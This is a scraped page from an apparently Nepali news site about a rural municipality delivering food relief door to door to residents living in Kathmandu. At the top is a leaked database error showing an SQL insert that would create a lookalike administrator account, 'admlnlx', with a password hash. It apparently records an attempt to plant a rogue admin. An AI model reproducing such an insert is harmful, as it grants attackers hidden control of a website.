WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bja9kaXG1JLKA76uOgQpizc.JIi8us1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 09:40:10', '', 'admlnlx', 'admlnlx')

काठमाडौंमा रहेका नेचासल्यान गाउँपालिका नागरिकलाई घरघरमै राहत – Gaule Khabar

काठमाडौंमा रहेका नेचासल्यान गाउँपालिका नागरिकलाई घरघरमै राहत

उद्धार गर्न छुटेर काठमाडौंमा रहेका नागरिकलाई बिहिबार राहत वितरण

काठमाडौंमा रहेका नेचासल्यान गाउँपालिका नागरिकलाई घरघरमै राहत

 

बैशाख १८, काठमाडौं –

नेचासल्यान गाउँपालिका, सोलुखुम्बुले उद्धार गर्न छुटेर काठमाडौंमा रहेका नागरिकलाई बिहिबार राहत वितरण गरेको छ ।

गाउँपालिकाका अध्यक्ष डुफकुमार बास्तोलाको  टोलिले काठमाडौंमा रहेका नेचासल्यान गाउँपालिका नागरिकलाई घरघरमै गएर अति आवश्यक खाद्य वस्तु चामल, नून, तेल र दाल बितरण गरेको हो ।

 

केही दिनअघि गाउँपालिकाले आफ्ना नागरिकलाई उद्धार गरेर गाउँ लगेको थियो भने केही नागरिक काठमाडौंमै रहेका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका